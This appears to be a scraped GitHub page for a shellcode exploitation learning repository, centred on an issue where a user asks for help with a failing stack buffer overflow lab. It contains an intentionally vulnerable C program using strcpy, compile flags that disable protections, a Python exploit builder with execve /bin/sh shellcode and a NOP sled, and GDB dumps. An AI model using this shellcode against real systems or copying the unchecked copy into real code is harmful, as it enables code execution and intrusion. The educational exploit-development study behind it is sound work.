hamza-megahed / pentest-with-shellcode Goto Github PK
View Code? Open in Web Editor NEWPenetration testing with shellcode codes
pentest-with-shellcode's People
Contributors
Stargazers
Watchers
Forkers
bb33bb 1337536723 rashid-tahir djwesleyborges jguerra7 midoxnet pincherf78 juan157 cowerman ab7ung sec-jspentest-with-shellcode's Issues
Unable to jump shellcode
Hi @Hamza-Megahed ,
I was unable reproduce https://github.com/Hamza-Megahed/pentest-with-shellcode/tree/master/7-exploit-development-part1,
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int copy_to_buffer(char* input)
{
char buffer[50];
strcpy (buffer,input);
return 0;
}
void main (int argc, char *argv[])
{
int local_variable = 1;
copy_to_buffer(argv[1]);
exit(0);
}gcc -m32 -fno-stack-protector -z execstack buffer.c -o buffer
#!/bin/usr/python
import struct
jump_shellcode = struct.pack("<I", 0xffffd0fc)
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buffer = "\x90" * 39
buffer += shellcode
buffer += jump_shellcode
fp = open("3.txt", "w")
fp.write(buffer)
fp.close()
print "Done!"GDB
(gdb)
(gdb)
(gdb) break main
Breakpoint 1 at 0x58b
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Breakpoint 1, 0x5655558b in main ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0cc: 0x5655556f 0xffffd0ee 0xffffd3e1 0xffffd0fb
0xffffd0dc: 0x56555559 0x000000c2 0x00000000 0x00c30000
0xffffd0ec: 0x90900001 0x90909090 0x90909090 0x90909090
0xffffd0fc: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd10c: 0x90909090 0x90909090 0x90909090 0x50c03190
0xffffd11c: 0x732f2f68 0x622f6868 0xe3876e69 0x80cd0bb0
0xffffd12c: 0x42424242you see overwrite EIP but when i set any address 0xffffd0fc always i get error Segmentation fault. not work /bin/sh,
After set EIP
GDB
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)
Program received signal SIGSEGV, Segmentation fault.
0xffffd126 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0c0: 0xffffd0fa 0x56556fd4 0xf7f9d000 0x5655556f
0xffffd0d0: 0xffffd0ee 0xffffd3e1 0xffffd0fb 0x56555559
0xffffd0e0: 0x000000c2 0x00000000 0x00c30000 0x90900001
0xffffd0f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd100: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd110: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xffffd120: 0x622f6868 0x6e69622f 0x68732f2f 0x00000000
0xffffd130: 0xffffd300 0x56556fd4 0x00000002 0x56555593
0xffffd140: 0x00000002 0xffffd204 0xffffd210 0x00000001EAX: 0x0
EBX: 0xe3876e69
ECX: 0xffffd420 --> 0xffffd0
EDX: 0xffffd12d --> 0x0
ESI: 0x2
EDI: 0xf7f9d000 --> 0x1d1d70
EBP: 0x80cd0bb0
ESP: 0xffffd124 ("/bin//sh")
EIP: 0xffffd126 ("in//sh")
my EIP is 0xffffd126 ("in//sh") 2 byte is missing here why?
Thanks,
Ahmed
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.